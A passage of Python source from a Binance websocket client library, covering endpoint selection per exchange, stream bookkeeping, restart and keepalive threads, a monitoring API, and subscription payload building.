elif self.exchange == "binance.com-margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-futures":
self.websocket_base_uri = "wss://fstream.binance.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.com-coin-futures" or self.exchange == "binance.com-coin_futures":
self.websocket_base_uri = "wss://dstream.binance.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.com-futures-testnet":
self.websocket_base_uri = "wss://stream.binancefuture.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.us":
self.websocket_base_uri = "wss://stream.binance.us:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "trbinance.com":
self.websocket_base_uri = "wss://stream.binance.cc/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "jex.com":
self.websocket_base_uri = "wss://ws.jex.com/"
self.max_subscriptions_per_stream = 10
elif self.exchange == "binance.org":
self.websocket_base_uri = "wss://dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.org-testnet":
self.websocket_base_uri = "wss://testnet-dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
else:
# Unknown Exchange
error_msg = f"Unknown exchange '{str(self.exchange)}'! Read the docs to see a list of supported " \
"exchanges: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_" \
"binance_websocket_api.html#module-unicorn_binance_websocket_api.unicorn_binance_websocket_" \
"api_manager"
logger.critical(error_msg)
raise UnknownExchange(error_msg)
self.stop_manager_request = None
self.all_subscriptions_number = 0
self.binance_api_status = {'weight': None,
'timestamp': 0,
'status_code': None}
self.dex_user_address = False
self.enable_stream_signal_buffer = enable_stream_signal_buffer
self.event_loops = {}
self.frequent_checks_list = {}
self.frequent_checks_list_lock = threading.Lock()
self.receiving_speed_average = 0
self.receiving_speed_peak = {'value': 0,
'timestamp': time.time()}
self.keep_max_received_last_second_entries = 5
self.keepalive_streams_list = {}
self.last_entry_added_to_stream_buffer = 0
self.last_monitoring_check = time.time()
self.last_update_check_github = {'timestamp': time.time(),
'status': None}
self.last_update_check_github_check_command = {'timestamp': time.time(),
'status': None}
self.max_send_messages_per_second = 5
self.max_send_messages_per_second_reserve = 2
self.most_receives_per_second = 0
self.monitoring_api_server = False
self.monitoring_total_received_bytes = 0
self.monitoring_total_receives = 0
self.output_default = output_default
self.reconnects = 0
self.reconnects_lock = threading.Lock()
self.request_id = 0
self.request_id_lock = threading.Lock()
self.restart_requests = {}
self.restart_timeout = restart_timeout
self.ringbuffer_error = []
self.ringbuffer_error_max_size = 500
self.ringbuffer_result = []
self.ringbuffer_result_max_size = 500
self.show_secrets_in_logs = show_secrets_in_logs
self.start_time = time.time()
self.stream_buffer_maxlen = stream_buffer_maxlen
self.stream_buffer = deque(maxlen=self.stream_buffer_maxlen)
self.stream_buffer_lock = threading.Lock()
self.stream_buffer_locks = {}
self.stream_buffers = {}
self.stream_list = {}
self.stream_list_lock = threading.Lock()
self.stream_signal_buffer = deque()
self.stream_signal_buffer_lock = threading.Lock()
self.stream_threading_lock = {}
self.throw_exception_if_unrepairable = throw_exception_if_unrepairable
self.total_received_bytes = 0
self.total_received_bytes_lock = threading.Lock()
self.total_receives = 0
self.total_receives_lock = threading.Lock()
self.total_transmitted = 0
self.total_transmitted_lock = threading.Lock()
self.websocket_list = {}
self.start()
self.replaced_secrets_text = "***SECRET_REMOVED***"
self.restclient = BinanceWebSocketApiRestclient(self)
if warn_on_update and self.is_update_availabe():
update_msg = f"Release {self.name}_" + self.get_latest_version() + " is available, " \
"please consider updating! (Changelog: https://github.com/oliver-zehentleitner/unicorn-" \
"binance-websocket-api/blob/master/CHANGELOG.md)"
print(update_msg)
logger.warning(update_msg)
def _add_stream_to_stream_list(self,
stream_id,
channels,
markets,
stream_label=None,
stream_buffer_name=False,
api_key=False,
api_secret=False,
symbols=False,
output=False,
ping_interval=False,
ping_timeout=False,
close_timeout=False,
stream_buffer_maxlen=None):
"""
Create a list entry for new streams
:param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
:type stream_id: uuid
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_label: provide a stream_label for the stream
:type stream_label: str
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:param output: the default setting `raw_data` can be globaly overwritten with the parameter
`output_default <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
of BinanceWebSocketApiManager`. To overrule the `output_default` value for this specific stream,
set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise with
the default setting "raw_data" the output remains unchanged and gets delivered as received from
the endpoints
:type output: str
:param ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_interval: int or None
:param ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_timeout: int or None
:param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type close_timeout: int or None
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` uses always the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
"""
if output is False:
output = self.output_default
self.stream_threading_lock[stream_id] = {'full_lock': threading.Lock(),
'receives_statistic_last_second_lock': threading.Lock()}
self.stream_list[stream_id] = {'exchange': self.exchange,
'stream_id': copy.deepcopy(stream_id),
'recent_socket_id': None,
'channels': copy.deepcopy(channels),
'markets': copy.deepcopy(markets),
'stream_label': copy.deepcopy(stream_label),
'stream_buffer_name': copy.deepcopy(stream_buffer_name),
'stream_buffer_maxlen': copy.deepcopy(stream_buffer_maxlen),
'symbols': copy.deepcopy(symbols),
'output': copy.deepcopy(output),
'subscriptions': 0,
'payload': [],
'api_key': copy.deepcopy(api_key),
'api_secret': copy.deepcopy(api_secret),
'dex_user_address': copy.deepcopy(self.dex_user_address),
'ping_interval': copy.deepcopy(ping_interval),
'ping_timeout': copy.deepcopy(ping_timeout),
'close_timeout': copy.deepcopy(close_timeout),
'status': 'starting',
'start_time': time.time(),
'processed_receives_total': 0,
'receives_statistic_last_second': {'most_receives_per_second': 0, 'entries': {}},
'seconds_to_last_heartbeat': None,
'last_heartbeat': None,
'kill_request': None,
'stop_request': None,
'crash_request': None,
'seconds_since_has_stopped': None,
'has_stopped': False,
'reconnects': 0,
'logged_reconnects': [],
'processed_transmitted_total': 0,
'last_static_ping_listen_key': 0,
'listen_key': False,
'listen_key_cache_time': 30 * 60,
'last_received_data_record': None,
'processed_receives_statistic': {},
'transfer_rate_per_second': {'bytes': {}, 'speed': 0}}
logger.info("BinanceWebSocketApiManager._add_stream_to_stream_list(" +
str(stream_id) + ", " + str(channels) + ", " + str(markets) + ", " + str(stream_label) + ", "
+ str(stream_buffer_name) + ", " + str(stream_buffer_maxlen) + ", " + str(symbols) + ")")
def _create_stream_thread(self,
loop,
stream_id,
channels,
markets,
stream_buffer_name=False,
stream_buffer_maxlen=None,
restart=False):
"""
Co function of self.create_stream to create a thread for the socket and to manage the coroutine
:param loop: provide a asynio loop
:type loop: asyncio loop
:param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
:type stream_id: uuid
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` uses always the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
:param restart: set to `True`, if its a restart!
:type restart: bool
:return:
"""
if self.is_stop_request(stream_id):
return False
if restart is False:
if stream_buffer_name is not False:
self.stream_buffer_locks[stream_buffer_name] = threading.Lock()
try:
# Not resetting the stream_buffer during a restart:
if self.stream_buffers[stream_buffer_name]:
pass
except KeyError:
self.stream_buffers[stream_buffer_name] = deque(maxlen=stream_buffer_maxlen)
asyncio.set_event_loop(loop)
socket = BinanceWebSocketApiSocket(self, stream_id, channels, markets)
try:
loop.run_until_complete(socket.start_socket())
except RuntimeError as error_msg:
if "cannot schedule new futures after interpreter shutdown" in str(error_msg):
logger.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f" - RuntimeError error_msg: - {str(error_msg)} - stopping and shutting down - read "
f"https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/131"
f" for further information!")
self.stop_manager_with_all_streams()
sys.exit(1)
logger.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f"error: 7 - {str(error_msg)} - if this stream did not restart after this error, please "
f"create an issue: "
f"https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/new/choose")
loop.close()
finally:
self.process_stream_signals("DISCONNECT", stream_id)
loop.close()
def _frequent_checks(self):
"""
This method gets started as a thread and is doing the frequent checks
"""
frequent_checks_id = time.time()
cpu_usage_time = False
with self.frequent_checks_list_lock:
self.frequent_checks_list[frequent_checks_id] = {'last_heartbeat': 0,
'stop_request': None,
'has_stopped': False}
logger.info("BinanceWebSocketApiManager._frequent_checks() new instance created with frequent_checks_id=" +
str(frequent_checks_id))
# threaded loop for min 1 check per second
while self.stop_manager_request is None and self.frequent_checks_list[frequent_checks_id]['stop_request'] \
is None:
with self.frequent_checks_list_lock:
self.frequent_checks_list[frequent_checks_id]['last_heartbeat'] = time.time()
time.sleep(0.3)
current_timestamp = int(time.time())
last_timestamp = current_timestamp - 1
next_to_last_timestamp = current_timestamp - 2
total_most_stream_receives_last_timestamp = 0
total_most_stream_receives_next_to_last_timestamp = 0
active_stream_list = self.get_active_stream_list()
# check CPU stats
cpu = self.get_process_usage_cpu()
if cpu >= 95:
time_of_waiting = 5
if cpu_usage_time is False:
cpu_usage_time = time.time()
elif (time.time() - cpu_usage_time) > time_of_waiting:
logger.warning(f"BinanceWebSocketApiManager._frequent_checks() - High CPU usage since "
f"{str(time_of_waiting)} seconds: {str(cpu)}")
cpu_usage_time = False
else:
cpu_usage_time = False
# count most_receives_per_second total last second
if active_stream_list:
for stream_id in active_stream_list:
# set the streams `most_receives_per_second` value
try:
if self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp] > \
self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']:
self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second'] = \
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
except KeyError:
pass
try:
total_most_stream_receives_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
except KeyError:
pass
try:
total_most_stream_receives_next_to_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][next_to_last_timestamp]
except KeyError:
pass
# delete list entries older than `keep_max_received_last_second_entries`
# receives_statistic_last_second
delete_index = []
if len(self.stream_list[stream_id]['receives_statistic_last_second']['entries']) > \
self.keep_max_received_last_second_entries:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
temp_entries = copy.deepcopy(self.stream_list[stream_id]['receives_statistic_last_second']['entries'])
for timestamp_key in temp_entries:
try:
if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
delete_index.append(timestamp_key)
except ValueError as error_msg:
logger.error(
"BinanceWebSocketApiManager._frequent_checks() timestamp_key=" + str(timestamp_key) +
" current_timestamp=" + str(current_timestamp) + " keep_max_received_last_second_"
"entries=" + str(self.keep_max_received_last_second_entries) + " error_msg=" +
str(error_msg))
for timestamp_key in delete_index:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'].pop(timestamp_key,
None)
# transfer_rate_per_second
delete_index = []
if len(self.stream_list[stream_id]['transfer_rate_per_second']['bytes']) > \
self.keep_max_received_last_second_entries:
try:
temp_bytes = self.stream_list[stream_id]['transfer_rate_per_second']['bytes']
for timestamp_key in temp_bytes:
try:
if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
delete_index.append(timestamp_key)
except ValueError as error_msg:
logger.error(
"BinanceWebSocketApiManager._frequent_checks() timestamp_key="
+ str(timestamp_key) +
" current_timestamp=" + str(current_timestamp) +
" keep_max_received_last_second_"
"entries=" + str(self.keep_max_received_last_second_entries) + " error_msg=" +
str(error_msg))
except RuntimeError as error_msg:
logger.info("BinanceWebSocketApiManager._frequent_checks() - "
"Catched RuntimeError: " + str(error_msg))
for timestamp_key in delete_index:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'].pop(timestamp_key, None)
# set most_receives_per_second
try:
if int(self.most_receives_per_second) < int(total_most_stream_receives_last_timestamp):
self.most_receives_per_second = int(total_most_stream_receives_last_timestamp)
except ValueError as error_msg:
logger.error("BinanceWebSocketApiManager._frequent_checks() self.most_receives_per_second"
"=" + str(self.most_receives_per_second) + " total_most_stream_receives_last_timestamp"
"=" + str(total_most_stream_receives_last_timestamp) + " total_most_stream_receives_next_"
"to_last_timestamp=" + str(total_most_stream_receives_next_to_last_timestamp) + " error_"
"msg=" + str(error_msg))
# check receiving_speed_peak
last_second_receiving_speed = self.get_current_receiving_speed_global()
try:
if last_second_receiving_speed > self.receiving_speed_peak['value']:
self.receiving_speed_peak['value'] = last_second_receiving_speed
self.receiving_speed_peak['timestamp'] = time.time()
logger.info(f"BinanceWebSocketApiManager._frequent_checks() - reached new "
f"`highest_receiving_speed` "
f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} at "
f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])}")
except TypeError as error_msg:
pass
# send keepalive for `!userData` streams every 30 minutes
if active_stream_list:
for stream_id in active_stream_list:
if isinstance(active_stream_list[stream_id]['markets'], str):
active_stream_list[stream_id]['markets'] = [active_stream_list[stream_id]['markets'], ]
if isinstance(active_stream_list[stream_id]['channels'], str):
active_stream_list[stream_id]['channels'] = [active_stream_list[stream_id]['channels'], ]
if "!userData" in active_stream_list[stream_id]['markets'] or \
"!userData" in active_stream_list[stream_id]['channels']:
if (active_stream_list[stream_id]['start_time'] + active_stream_list[stream_id]['listen_key_cache_time']) \
< time.time() and (active_stream_list[stream_id]['last_static_ping_listen_key'] +
active_stream_list[stream_id]['listen_key_cache_time']) < time.time():
# keep-alive the listenKey
self.restclient.keepalive_listen_key(stream_id)
# set last_static_ping_listen_key
self.stream_list[stream_id]['last_static_ping_listen_key'] = time.time()
self.set_heartbeat(stream_id)
logger.info("BinanceWebSocketApiManager._frequent_checks() - sent listen_key keepalive "
"ping for stream_id=" + str(stream_id))
sys.exit(0)
def _keepalive_streams(self):
"""
This method is started as a thread and is observing the streams, if neccessary it restarts a dead stream
"""
keepalive_streams_id = time.time()
self.keepalive_streams_list[keepalive_streams_id] = {'last_heartbeat': 0,
'stop_request': None,
'has_stopped': False}
logger.info(
"BinanceWebSocketApiManager._keepalive_streams() new instance created with keepalive_streams_id=" +
str(keepalive_streams_id))
# threaded loop to restart crashed streams:
while self.stop_manager_request is None and \
self.keepalive_streams_list[keepalive_streams_id]['stop_request'] is None:
time.sleep(1)
self.keepalive_streams_list[keepalive_streams_id]['last_heartbeat'] = time.time()
# restart streams with a restart_request (status == new)
temp_restart_requests = copy.deepcopy(self.restart_requests)
for stream_id in temp_restart_requests:
try:
# find restarts that didnt work
if self.restart_requests[stream_id]['status'] == "restarted" and \
self.restart_requests[stream_id]['last_restart_time']+self.restart_timeout < time.time():
self.restart_requests[stream_id]['status'] = "new"
# restart streams with requests
if self.restart_requests[stream_id]['status'] == "new" or \
self.stream_list[stream_id]['kill_request'] is True:
self.kill_stream(stream_id)
thread = threading.Thread(target=self._restart_stream_thread, args=(stream_id,))
thread.start()
except KeyError:
pass
sys.exit(0)
def _restart_stream(self, stream_id):
"""
This is NOT stop/start! Its purpose is to start a died stream again! Use `set_restart_request()` for stop/start!
:param stream_id: id of a stream
:type stream_id: uuid
:return: stream_id or False
"""
try:
if self.restart_requests[stream_id]['status'] != "new":
logger.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request()` "
"instead!")
return False
except KeyError:
# no restart_request entry for this stream_id:
logger.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request() instead!")
return False
logger.info("BinanceWebSocketApiManager._restart_stream(" + str(stream_id) + ", " +
str(self.stream_list[stream_id]['channels']) +
", " + str(self.stream_list[stream_id]['markets']) + ")")
self.restart_requests[stream_id] = {'status': "restarted"}
self.restart_requests[stream_id]['last_restart_time'] = time.time()
self.stream_list[stream_id]['status'] = "restarting"
self.stream_list[stream_id]['kill_request'] = None
self.stream_list[stream_id]['payload'] = []
try:
loop = asyncio.new_event_loop()
except OSError as error_msg:
logger.critical(f"BinanceWebSocketApiManager.create_stream({str(stream_id)}) - OSError - "
f"error_msg: {str(error_msg)}")
return False
self.event_loops[stream_id] = loop
thread = threading.Thread(target=self._create_stream_thread,
args=(loop,
stream_id,
self.stream_list[stream_id]['channels'],
self.stream_list[stream_id]['markets'],
self.stream_list[stream_id]['stream_buffer_name'],
self.stream_list[stream_id]['stream_buffer_maxlen'],
True))
thread.start()
return stream_id
def _restart_stream_thread(self, stream_id):
"""
Wait till the old socket has closed and then start it again
:param stream_id: id of a stream
:type stream_id: uuid
"""
self._restart_stream(stream_id)
def _start_monitoring_api_thread(self, host, port, warn_on_update):
"""
Threaded method that servces the monitoring api
:param host: IP or hostname to use
:type host: str
:param port: Port to use
:type port: int
:param warn_on_update: Should the monitoring system report available updates?
:type warn_on_update: bool
"""
logger.info("BinanceWebSocketApiManager._start_monitoring_api_thread() - Starting monitoring API service ...")
app = Flask(__name__)
@app.route('/')
@app.route('/status/')
def redirect_to_wiki():
logger.info("BinanceWebSocketApiManager._start_monitoring_api_thread() 200 - "
"Visit https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/UNICORN-"
"Monitoring-API-Service for further information!")
return redirect("https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/"
"UNICORN-Monitoring-API-Service", code=302)
api = Api(app)
api.add_resource(BinanceWebSocketApiRestServer,
"/status/<string:statusformat>/",
"/status/<string:statusformat>/<string:checkcommandversion>",
resource_class_kwargs={'handler_binance_websocket_api_manager': self,
'warn_on_update': warn_on_update})
try:
dispatcher = wsgi.PathInfoDispatcher({'/': app})
self.monitoring_api_server = wsgi.WSGIServer((host, port), dispatcher)
self.monitoring_api_server.start()
except RuntimeError as error_msg:
logger.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
"going down! - Info: " + str(error_msg))
except OSError as error_msg:
logger.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
"going down! - Info: " + str(error_msg))
def add_to_ringbuffer_error(self, error):
"""
Add received error messages from websocket endpoints to the error ringbuffer
:param error: The data to add.
:type error: string
:return: bool
"""
while len(self.ringbuffer_error) >= self.get_ringbuffer_error_max_size():
self.ringbuffer_error.pop(0)
self.ringbuffer_error.append(str(error))
return True
def add_to_ringbuffer_result(self, result):
"""
Add received result messages from websocket endpoints to the result ringbuffer
:param result: The data to add.
:type result: string
:return: bool
"""
while len(self.ringbuffer_result) >= self.get_ringbuffer_result_max_size():
self.ringbuffer_result.pop(0)
self.ringbuffer_result.append(str(result))
return True
def add_to_stream_buffer(self, stream_data, stream_buffer_name=False):
"""
Kick back data to the
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
If it is not possible to process received stream data (for example, the database is restarting, so its not
possible to save the data), you can return the data back into the stream_buffer. After a few seconds you stopped
writing data back to the stream_buffer, the BinanceWebSocketApiManager starts flushing back the data to normal
processing.
:param stream_data: the data you want to write back to the buffer
:type stream_data: raw stream_data or unicorn_fied stream data
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:return: bool
"""
if stream_buffer_name is False:
with self.stream_buffer_lock:
self.stream_buffer.append(stream_data)
else:
with self.stream_buffer_locks[stream_buffer_name]:
self.stream_buffers[stream_buffer_name].append(stream_data)
self.last_entry_added_to_stream_buffer = time.time()
return True
def add_to_stream_signal_buffer(self, signal_type=False, stream_id=False, data_record=False):
"""
Add signals about a stream to the
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
:param signal_type: "CONNECT", "DISCONNECT" or "FIRST_RECEIVED_DATA"
:type signal_type: str
:param stream_id: id of a stream
:type stream_id: uuid
:param data_record: The last or first received data record
:type data_record: str or dict
:return: bool
"""
if self.enable_stream_signal_buffer:
stream_signal = {'type': signal_type,
'stream_id': stream_id,
'timestamp': time.time()}
if signal_type == "CONNECT":
# nothing to add ...
pass
elif signal_type == "DISCONNECT":
try:
stream_signal['last_received_data_record'] = self.stream_list[stream_id]['last_received_data_record']
except KeyError as error_msg:
logger.critical(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
f"Cant determine last_received_data_record! - error_msg: {error_msg}")
stream_signal['last_received_data_record'] = None
elif signal_type == "FIRST_RECEIVED_DATA":
stream_signal['first_received_data_record'] = data_record
else:
logger.error(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
f"Received invalid `signal_type`!")
return False
with self.stream_signal_buffer_lock:
self.stream_signal_buffer.append(stream_signal)
logger.info(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({stream_signal})")
return True
else:
return False
def add_total_received_bytes(self, size):
"""
Add received bytes to the total received bytes statistic
:param size: int value of added bytes
:type size: int
"""
with self.total_received_bytes_lock:
self.total_received_bytes += int(size)
def clear_stream_buffer(self, stream_buffer_name=False):
"""
Clear the
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:return: bool
"""
if stream_buffer_name is False:
try:
self.stream_buffer.clear()
return True
except IndexError:
return False
else:
try:
with self.stream_buffer_locks[stream_buffer_name]:
self.stream_buffers[stream_buffer_name].clear()
return True
except IndexError:
return False
except KeyError:
return False
def create_payload(self, stream_id, method, channels=False, markets=False):
"""
Create the payload for subscriptions
:param stream_id: provide a stream_id
:type stream_id: uuid
:param method: `SUBSCRIBE` or `UNSUBSCRIBE`
:type method: str
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:return: payload (list) or False
"""
logger.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
str(markets) + ") started ...")
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
payload = []
if self.is_exchange_type("dex"):
if method == "subscribe" and channels is not False:
for channel in channels:
add_payload = {"method": method,
"topic": channel}
symbols = []
if channel == "allMiniTickers" or \
channel == "allTickers" or \
channel == "blockheight":
add_payload["symbols"] = ["$all"]
payload.append(add_payload)
continue
if markets:
for market in markets:
if market == "allMiniTickers" or \
market == "allTickers" or \
market == "blockheight":
add_payload_from_market = {"method": method,
"topic": market,
"symbols": ["$all"]}
payload.append(add_payload_from_market)
continue
elif re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = market
else:
symbols.append(market)
try:
if self.stream_list[stream_id]["dex_user_address"] is not False:
add_payload["address"] = self.stream_list[stream_id]["dex_user_address"]
payload.append(add_payload)
except KeyError:
pass
if len(symbols) > 0:
add_payload["symbols"] = symbols
payload.append(add_payload)
elif method == "unsubscribe":
if markets:
add_payload = {"method": method}
for market in markets:
if re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = market
markets.remove(market)
if len(markets) > 0:
add_payload["symbols"] = markets
payload.append(add_payload)
if channels:
for channel in channels:
add_payload = {"method": method,
"topic": channel}
payload.append(add_payload)
else:
logger.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
"or `unsubscribe`!")
return False
elif self.is_exchange_type("cex"):
final_market = "@arr"
if markets:
for market in markets:
if "arr@" in market:
final_market = "@" + market
final_channel = "@arr"
if channels:
for channel in channels:
if "arr@" in channel:
final_channel = "@" + channel
if method == "subscribe":
params = []
for channel in channels:
if "!" in channel:
params.append(channel + final_market)
continue
else:
for market in markets:
if "!" in market:
params.append(market + final_channel)
else:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
params = list(set(params))
payload = self.split_payload(params, "SUBSCRIBE")
elif method == "unsubscribe":
if markets:
params = []
try:
for channel in self.stream_list[stream_id]['channels']:
if "!" in channel:
params.append(channel + final_market)
else:
for market in markets:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
payload = self.split_payload(params, "UNSUBSCRIBE")
except KeyError:
pass
if channels:
params = []
for market in self.stream_list[stream_id]['markets']:
if "!" in market:
params.append(market + final_channel)
else:
for channel in channels:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
payload = self.split_payload(params, "UNSUBSCRIBE")
else:
logger.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
"or `unsubscribe`!")
return False
logger.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Payload: " + str(payload))
logger.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
str(markets) + ") finished ...")
return payload
def create_stream(self,
channels,
markets,
stream_label=None,
stream_buffer_name=False,
api_key=False,
api_secret=False,
symbols=False,
output=False,
ping_interval=20,
ping_timeout=20,
close_timeout=10,
stream_buffer_maxlen=None):
"""
Create a websocket stream
If you provide 2 markets and 2 channels, then you are going to create 4 subscriptions (markets * channels).
Example:
channels = ['trade', 'kline_1']
markets = ['bnbbtc', 'ethbtc']
Finally: bnbbtc@trade, ethbtc@trade, bnbbtc@kline_1, ethbtc@kline_1
`There is a subscriptions limit per stream!
<https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/Binance-websocket-endpoint-configuration-overview>`_
Create `!userData` streams as single streams, because its using a different endpoint and can not get combined
with other streams in a multiplexed stream!
Example CEX:
``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb")``
Isolated Margin:
``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb", symbols="ankrbtc")``
Example DEX:
``binance_websocket_api_manager.create_stream(['orders', 'transfers', 'accounts'], binance_dex_user_address)``
To create a multiplexed stream which includes also `!miniTicker@arr`, `!ticker@arr`, `!forceOrder@arr` or
`!bookTicker@arr` you just need to add `!bookTicker` to the channels list - dont add `arr` (cex) or `$all`
(dex) to the markets list.
Example:
``binance_websocket_api_manager.create_stream(['kline_5m', 'marketDepth', '!miniTicker'], ['bnbbtc'])``
But you have to add `arr` or `$all` if you want to start it as a single stream!
Example:
``binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"])``
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:param stream_label: provide a stream_label to identify the stream
:type stream_label: str
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param api_key: provide a valid Binance API key
